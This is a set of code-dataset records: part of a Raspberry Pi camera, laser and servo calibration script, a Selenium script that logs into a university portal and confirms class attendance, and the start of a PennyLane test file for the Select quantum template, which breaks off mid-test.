y = points[int(random_index),1]\n z = points[int(random_index),2]\n print(x,y,z)\n A = Matrix(x,y,z,u,v,A)\n cnt = cnt + 1\n ServoReady = 1\n else :\n raise ValueError(\"No object detected!\")\n # Stop sending command to servos when ServoReady = 0 \n if ServoReady == 1:\n if cnt < number_of_samples :\n #get the random points on the roof for calibration\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5)) \n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n else : \n GPIO.output(tll, GPIO.HIGH)\n M = sol_svd(A)\n print(M)\n np.savetxt('Calibration_matrix.csv', np.array(M), fmt=\"%s\",delimiter=',')\n servoReady = 1\n cnt = 0 \n mode = 3 \n \n #mode 3: Test\n while mode == 3 :\n # Capture frame\n _, frame = cap.read()\n hsv_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n green = cv2.inRange(hsv_image, lower_green, upper_green)\n # remove noise\n kernel = np.ones((5,5),np.uint8)\n green = cv2.morphologyEx(green, cv2.MORPH_CLOSE, kernel)\n cnts,_ = cv2.findContours(green,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) \n if len(cnts) != 0:\n # find the biggest countour (c) by the area\n c = max(cnts, key = cv2.contourArea) \n (X, Y, W, H) = cv2.boundingRect(c)\n cv2.rectangle(frame, (X, Y), (X + W, Y + H), (255, 0, 0), 3) \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n # The servos are in position \n if line == \"In position\":\n # Do matching when servos are in position\n if len(cnts) != 0:\n # compute the center of the contour\n u = round((X + W) / 2)\n v = round((Y + H) / 
2)\n # get the mapped 3D coordinate\n p3 = get_corr_point(M, u, v) \n p3 = np.real(p3)\n print(u,v)\n print(p3)\n # \"real\" 3D coordinate, from point clouds \n x = points[int(random_index),0] \n y = points[int(random_index),1]\n z = points[int(random_index),2]\n print(x,y,z)\n p3_real = np.array([[x], [y], [z]])\n diff.append(p3-p3_real) \n cnt = cnt + 1\n ServoReady = 1\n else :\n # raise error if nothing is detected by the camera\n raise ValueError(\"No object detected!\")\n # Stop sending command to servos\n # when ServoReady = 0 \n if ServoReady == 1:\n if cnt == 0 :\n #get the random points on the roof for calibration verification\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5)) \n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 1 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 2 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 3 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 4 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0\n elif cnt == 5 :\n random_index = random.randrange(round(rawM.size/5*0.95),round(rawM.size/5))\n pan,tilt = GetPanTilt(random_index,rawM) \n MotorControl(pan,tilt) \n ServoReady = 0 \n elif cnt == 6 :\n ServoReady = 0\n print(diff)\n # Turn off laser\n GPIO.output(tll, GPIO.LOW)\n sys.exit()\n \n \n# beetle test \n while mode == 4 :\n \n GPIO.output(tll,GPIO.HIGH)\n direction = np.array([0,90/180*math.pi])\n phi = 0 #The angle between the movement direction of the dung beetle and the positive X axis\n beetle_moving_direction = phi\n direction = direction + phi # Rotate \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n # The servos are in position \n if line == \"In position\":\n cnt = cnt + 1\n ServoReady = 1\n end = datetime.datetime.now()\n period = end - start\n print(int(period.total_seconds()*1000),\"ms\")\n print(\"in position\")\n \n if ServoReady == 1:\n if cnt < 20:\n random_x = random.randrange(0,640)\n random_y = random.randrange(0,480)\n print(\"location on image \",random_x, random_y)\n random_location = get_corr_point(M, random_x, random_y)\n beetle_location_x = random_location[0]\n beetle_location_y = random_location[1]\n beetle_location = [beetle_location_x,beetle_location_y]; # Detect the beetle location\n print(\"beetle_location\",beetle_location)\n new_points = ConvertXYZ(beetle_location,points)\n angle_distance = GetAngle(new_points) #new_points \n [index,laser_target] = GetLaserTarget(direction,angle_distance,points)\n print(\"laser target \",laser_target)\n pan,tilt = GetPanTilt(index,rawM)\n start = datetime.datetime.now()\n MotorControl(pan,tilt)\n ServoReady = 0\n \n \n \n \n", "repo_name": "eziohhd/EDAN70_CS_PROJECT", "sub_path": "Raspberry pi/calibration_test.py", "file_name": "calibration_test.py", "file_ext": "py", "file_size_in_byte": 13503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 32, 
"usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 75, "usage_type": "call"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 90, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 90, "usage_type": "name"}, {"api_name": "RPi.GPIO.setmode", "line_number": 91, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 91, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 91, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 92, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 92, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 92, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 93, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 93, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 93, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 94, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 94, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 98, "usage_type": "call"}, {"api_name": "inquirer.List", "line_number": 108, "usage_type": "call"}, {"api_name": "inquirer.prompt", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 144, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 151, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 151, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 154, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 157, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 159, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 159, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 159, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 162, "usage_type": "attribute"}, {"api_name": "cv2.boundingRect", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 164, "usage_type": 
"call"}, {"api_name": "random.randrange", "line_number": 192, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 197, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 197, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 209, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 209, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 212, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 213, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 214, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 214, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 214, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 217, "usage_type": "attribute"}, {"api_name": "cv2.boundingRect", "line_number": 218, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 240, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 252, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 257, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 262, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 267, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 272, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 277, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 285, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 285, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 285, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 286, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 292, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 292, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 292, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 304, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 304, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 311, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 324, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 324, "usage_type": "attribute"}]} +{"seq_id": "37590141988", "text": "from selenium import webdriver \nfrom selenium.webdriver.firefox.options import Options \nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.support import expected_conditions as EC\nimport math\nimport requests\nimport 
time\n\n# Akun USK untuk Login\nNIM = 'NIM'\nPASS = 'PASS'\nMAX_WAIT_TIME = 20 # waktu tunggu maksimal dalam seconds\n\n# Inisialisasi variabel status untuk flow dependency\nstatus = True\n# Fungsi untuk mengklik elemen by CSS SELECTOR setelah menunggu\ndef click_by_css(css_selector, label):\n global status # menggunakan variable status mejadi global\n try:\n WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, css_selector))\n ).click()\n print(f\"Tombol '{label}' di klik\")\n except TimeoutException:\n print(f\"Tombol '{label}' tidak ditemukan atau tidak dapat diklik.\")\n status = False # Set status menjadi false jika tombol gagal di klik\n\n# Fungsi untuk mengisi teks pada kolom berdasarkan atribut name dan nilainya \ndef fill_text_by_name(value_of_name, text_to_fill):\n try:\n elemen = WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.presence_of_element_located((By.NAME, value_of_name))\n )\n elemen.clear()\n elemen.send_keys(text_to_fill)\n except TimeoutException:\n print(f\"Elemen dengan atribut 'NAME'='{value_of_name}' tidak ditemukan atau tidak dapat diisi.\")\n\n# Fungsi untuk mencetak teks dari elemen dengan selector CSS\ndef print_text_by_css(css_selector, message=\"\"):\n try:\n elemen = WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, css_selector))\n )\n teks_elemen = elemen.text\n print(f\"{message}{teks_elemen}\")\n except TimeoutException:\n print(f\"'{css_selector}' tidak ditemukan.\")\n\n# Fungsi untuk mencetak teks dari elemen dengan selector CSS\ndef get_text_by_css(css_selector):\n try:\n elemen = WebDriverWait(driver, MAX_WAIT_TIME).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, css_selector))\n )\n text = elemen.text\n return text\n except TimeoutException:\n return None\n\n# Fungsi untuk membuka atau pindah url baru\ndef go_to_url(url):\n # opening the target website in the browser \n driver.get(url)\n #printing the target website url and title\n print(f\"Membuka '{driver.current_url}' \")\n\n# Fungsi untuk keluar program\ndef exit_program(message):\n print(message, \"Exiting..\")\n exit()\n\n# Fungsi untuk memeriksa koneksi internet\ndef is_internet_available(url=\"https://google.com\"):\n try:\n # Cobalah menghubungi server Google\n response = requests.get(url, timeout=10000)\n return True\n except requests.ConnectionError:\n return False\n\n# the target website \nurl_login = \"https://simkuliah.usk.ac.id/index.php/login\" \nurl_absensi = \"https://simkuliah.usk.ac.id/index.php/absensi\"\n\n\n# the interface for turning on headless mode \noptions = Options() \noptions.add_argument(\"-headless\") \n\n# Inisialisasi Elemen\n# cara : inspect element web pages, get the button or text field, right click, copy, choose css selector or xpath or whatever you want.\nlogin = \"div.row:nth-child(5) > div:nth-child(1) > button:nth-child(1)\" #css selector\n# absensi = \"a[href='https://simkuliah.usk.ac.id/index.php/absensi']\"\nkonfirmasi_kehadiran = \"#konfirmasi-kehadiran\" #css selector\nkonfirmasi = \"body > div.sweet-alert.showSweetAlert.visible > div.sa-button-container > div > button\"\nnama_akun = \"#pcoded > div.pcoded-container.navbar-wrapper > nav > div > div.navbar-container.container-fluid > div > ul.nav-right > li.user-profile.header-notification > a > span\"\ncheck_absen = \"#pcoded > div.pcoded-container.navbar-wrapper > div > div > div.pcoded-content > div > div > div > div.page-body > div > div > div > div > div:nth-child(1) > div > div > p\"\nvalid_alert = 
\"body > section > div > div > div > div.login-card.card-block.auth-body > form > div.auth-box > div.alert.alert-danger.icons-alert\"\nmk_sekarang = \"#pcoded > div.pcoded-container.navbar-wrapper > div > div > div.pcoded-content > div > div > div > div.page-body > div > div > div > div.card-header > h5\"\ninfo_absensi = \"#pcoded > div.pcoded-container.navbar-wrapper > div > div > div.pcoded-content > div > div > div > div.page-body > div > div > div > div.card-block > div > div:nth-child(1) > div > p\"\n\n\ntry:\n # Check ketersediaan internet\n if is_internet_available():\n # using Firefox headless webdriver to secure connection to Firefox \n with webdriver.Firefox(options=options) as driver:\n \n go_to_url(url_login) # pergi ke halaman login\n # Mengisi username, password and signin elements\n fill_text_by_name(\"username\", NIM)\n fill_text_by_name(\"password\", PASS)\n \n # Flow click tombol\n # Flow Login\n if status:\n click_by_css(login, \"Login\") \n # Jika berhasil masuk\n nama = get_text_by_css(nama_akun)\n if nama:\n length = 6 + len(nama)\n print(\"Login Berhasil!\")\n print('='* math.ceil((length-6)/2) ,\"INFO\", '='* math.ceil((length-6)/2) )\n print(\"Nama:\",nama)\n print(\"NIM:\",NIM)\n print('='*(length+1))\n \n # Flow pergi ke halaman absensi \n go_to_url(url_absensi) # pergi ke halaman absensi\n check = get_text_by_css(check_absen) # Mendapatkan teks jika absen belum tersedia\n \n # Jika absen belum tersedia maka program berhenti\n if \"sudah\" in check.lower():\n exit_program(check) \n else:\n mataKuliah = get_text_by_css(mk_sekarang) # Dapatkan mata kuliah yang sedang berlangsung\n info_absensi_check = get_text_by_css(info_absensi) # dapatkan teks anda sudah absen atau belum\n\n if mataKuliah and info_absensi_check:\n print(\"Mata Kuliah:\", mataKuliah)\n\n # dapatkan kata kedua yaitu belum atau sudah dari info_absensi_check\n info_c = info_absensi_check.split()\n if (info_c[1].lower() == \"belum\"):\n print(info_absensi_check)\n # click_by_css(konfirmasi_kehadiran, \"konfirmasi kehadiran\")\n # click_by_css(konfirmasi, \"konfirmasi absen\")\n time.sleep(3.0)\n driver.find_element(By.CSS_SELECTOR, konfirmasi_kehadiran).click()\n time.sleep(3.0)\n driver.find_element(By.CSS_SELECTOR, konfirmasi).click()\n\n go_to_url(url_absensi) # pergi ke halaman absensi\n info_absensi_check = get_text_by_css(info_absensi) # dapatkan teks anda sudah absen atau belum\n info_c = info_absensi_check.split()\n if (info_c[1].lower() == \"sudah\"):\n exit_program(f\"Absensi {mk_sekarang}\\nberhasil!\")\n else:\n exit_program(info_absensi_check)\n # jika selain belum\n else:\n exit_program(info_absensi_check)\n\n else:\n exit_program(\"Gagal mengindeks MK dan Info_absen\")\n \n # Flow untuk klik tombol hadir\n # click_by_css(hadir, \"Hadir\")\n # click_by_css(konfirmasi, \"Konfirmasi\")\n \n else:\n # Menampilkan kesalahan jika username atau pass salah\n if NIM and PASS: \n error_alert = get_text_by_css(valid_alert)\n exit_program(error_alert)\n\n exit_program(\"Gagal login!\")\n \n driver.close()\n else:\n gagal = \"Gagal Terhubung. 
Coba lagi nanti.\"\n exit_program(gagal)\nexcept WebDriverException as e:\n print(\"Terjadi kesalahan:\", str(e))\n", "repo_name": "riparuk/skrip-malas", "sub_path": "autoAbsenSimkuliah.py", "file_name": "autoAbsenSimkuliah.py", "file_ext": "py", "file_size_in_byte": 8641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 34, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 46, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 57, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 57, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 61, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 82, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.firefox.options.Options", "line_number": 91, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 111, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 111, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 127, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 152, "usage_type": "call"}, {"api_name": 
"selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 153, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 153, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 154, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 155, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 155, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.WebDriverException", "line_number": 187, "usage_type": "name"}]} +{"seq_id": "31505617542", "text": "import copy\nimport pytest\nimport numpy as np\nfrom pennylane import numpy as pnp\nimport pennylane as qml\n\n\nclass TestSelect:\n \"\"\"Tests that the template defines the correct decomposition.\"\"\"\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"expected_gates\", \"n_wires\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0)],\n [1],\n [\n qml.ctrl(qml.PauliX(wires=0), control=1, control_values=0),\n qml.ctrl(qml.PauliY(wires=0), control=1),\n ],\n 2,\n ),\n (\n [qml.PauliX(wires=0), qml.Identity(wires=0), qml.PauliZ(wires=0)],\n [1, 2],\n [\n qml.ctrl(qml.PauliX(wires=0), control=[1, 2], control_values=[0, 0]),\n qml.ctrl(qml.PauliZ(wires=0), control=[1, 2], control_values=[1, 0]),\n ],\n 3,\n ),\n (\n [\n qml.PauliX(wires=0),\n qml.Identity(wires=0),\n qml.Identity(wires=0),\n qml.RX(0.3, wires=0),\n ],\n [1, 2],\n [\n qml.ctrl(qml.PauliX(wires=0), control=[1, 2], control_values=[0, 0]),\n qml.ctrl(qml.RX(0.3, wires=0), control=[1, 2], control_values=[1, 1]),\n ],\n 3,\n ),\n (\n [qml.PauliX(wires=\"a\"), qml.RX(0.7, wires=\"b\")],\n [\"c\", 1],\n [\n qml.ctrl(qml.PauliX(wires=\"a\"), control=[\"c\", 1], control_values=[0, 0]),\n qml.ctrl(qml.RX(0.7, wires=\"b\"), control=[\"c\", 1], control_values=[0, 1]),\n ],\n [\"a\", \"b\", \"c\", 1],\n ),\n ],\n )\n def test_operation_result(self, ops, control, expected_gates, n_wires):\n \"\"\"Test the correctness of the Select template output.\"\"\"\n dev = qml.device(\"default.qubit\", wires=n_wires)\n\n @qml.qnode(dev)\n def circuit1():\n for wire in control:\n qml.Hadamard(wires=wire)\n\n qml.Select(ops, control)\n return qml.state()\n\n @qml.qnode(dev)\n def circuit2():\n for wire in control:\n qml.Hadamard(wires=wire)\n for op in expected_gates:\n qml.apply(op)\n return qml.state()\n\n assert np.allclose(circuit1(), circuit2())\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"expected_gates\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0)],\n [1],\n [\n qml.ctrl(qml.PauliX(wires=0), control=1, control_values=0),\n qml.ctrl(qml.PauliY(wires=0), control=1),\n ],\n ),\n (\n [qml.RX(0.5, wires=0), qml.RY(0.7, wires=1)],\n [2],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=2, control_values=0),\n qml.ctrl(qml.RY(0.7, wires=1), control=2),\n ],\n ),\n (\n [\n qml.RX(0.5, wires=0),\n qml.RY(0.7, wires=1),\n qml.RZ(0.3, wires=1),\n qml.PauliX(wires=2),\n ],\n [3, 4],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=[3, 4], control_values=[0, 0]),\n qml.ctrl(qml.RY(0.7, wires=1), control=[3, 4], control_values=[0, 1]),\n qml.ctrl(qml.RZ(0.3, wires=1), control=[3, 4], control_values=[1, 0]),\n qml.ctrl(qml.PauliX(wires=2), control=[3, 4], control_values=[1, 1]),\n ],\n ),\n ],\n )\n def test_queued_ops(self, ops, control, expected_gates):\n \"\"\"Test the correctness of the Select template queued operations.\"\"\"\n with qml.tape.OperationRecorder() as recorder:\n qml.Select(ops, control=control)\n\n select_ops = 
recorder.expand().operations\n\n assert [op.name for op in select_ops] == [op.name for op in expected_gates]\n assert [op.wires for op in select_ops] == [op.wires for op in expected_gates]\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"expected_gates\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0)],\n [1],\n [\n qml.ctrl(qml.PauliX(wires=0), control=1, control_values=0),\n qml.ctrl(qml.PauliY(wires=0), control=1),\n ],\n ),\n (\n [qml.RX(0.5, wires=0), qml.RY(0.7, wires=1)],\n [2],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=2, control_values=0),\n qml.ctrl(qml.RY(0.7, wires=1), control=2),\n ],\n ),\n (\n [\n qml.RX(0.5, wires=0),\n qml.RY(0.7, wires=1),\n qml.RZ(0.3, wires=1),\n qml.PauliX(wires=2),\n ],\n [3, 4],\n [\n qml.ctrl(qml.RX(0.5, wires=0), control=[3, 4], control_values=[0, 0]),\n qml.ctrl(qml.RY(0.7, wires=1), control=[3, 4], control_values=[0, 1]),\n qml.ctrl(qml.RZ(0.3, wires=1), control=[3, 4], control_values=[1, 0]),\n qml.ctrl(qml.PauliX(wires=2), control=[3, 4], control_values=[1, 1]),\n ],\n ),\n ],\n )\n def test_decomposition(self, ops, control, expected_gates):\n \"\"\"Unit test checking that compute_decomposition and decomposition work as expected.\"\"\"\n op = qml.Select(ops, control=control)\n select_decomposition = op.decomposition()\n select_compute_decomposition = op.compute_decomposition(ops, control)\n\n assert all(qml.equal(op1, op2) for op1, op2 in zip(select_decomposition, expected_gates))\n assert all(\n qml.equal(op1, op2) for op1, op2 in zip(select_compute_decomposition, expected_gates)\n )\n\n # pylint: disable=protected-access\n def test_flatten_unflatten(self):\n \"\"\"Test that the _flatten and _unflatten functions work as expected.\"\"\"\n ops = [qml.PauliX(wires=2), qml.PauliX(wires=3), qml.PauliY(wires=2), qml.SWAP([2, 3])]\n op = qml.Select(ops, control=[0, 1])\n data, metadata = op._flatten()\n\n assert hash(metadata)\n\n assert len(data) == len(ops)\n assert all(qml.equal(op1, op2) for op1, op2 in zip(data, ops))\n\n assert metadata == op.control\n\n new_op = type(op)._unflatten(*op._flatten())\n assert all(qml.equal(op1, op2) for op1, op2 in zip(op.ops, new_op.ops))\n assert op.wires == new_op.wires\n assert op.control == new_op.control\n assert op.target_wires == new_op.target_wires\n assert op is not new_op\n\n def test_copy(self):\n \"\"\"Test that the copy function of Select works correctly.\"\"\"\n ops = [qml.PauliX(wires=2), qml.RX(0.2, wires=3), qml.PauliY(wires=2), qml.SWAP([2, 3])]\n op = qml.Select(ops, control=[0, 1])\n op_copy = copy.copy(op)\n\n assert qml.equal(op, op_copy)\n\n\nclass TestErrorMessages:\n \"\"\"Test that the correct errors are raised\"\"\"\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"msg_match\"),\n [\n (\n [qml.PauliX(wires=1), qml.PauliY(wires=0), qml.PauliZ(wires=0)],\n [1, 2],\n \"Control wires should be different from operation wires.\",\n ),\n (\n [qml.PauliX(wires=2)] * 4,\n [1, 2, 3],\n \"Control wires should be different from operation wires.\",\n ),\n (\n [qml.PauliX(wires=\"a\"), qml.PauliY(wires=\"b\")],\n [\"a\"],\n \"Control wires should be different from operation wires.\",\n ),\n ],\n )\n def test_control_in_ops(self, ops, control, msg_match):\n \"\"\"Test an error is raised when a control wire is in one of the ops\"\"\"\n with pytest.raises(ValueError, match=msg_match):\n qml.Select(ops, control)\n\n @pytest.mark.parametrize(\n (\"ops\", \"control\", \"msg_match\"),\n [\n (\n [qml.PauliX(wires=0), qml.PauliY(wires=0), qml.PauliZ(wires=0)],\n [1],\n r\"Not enough 
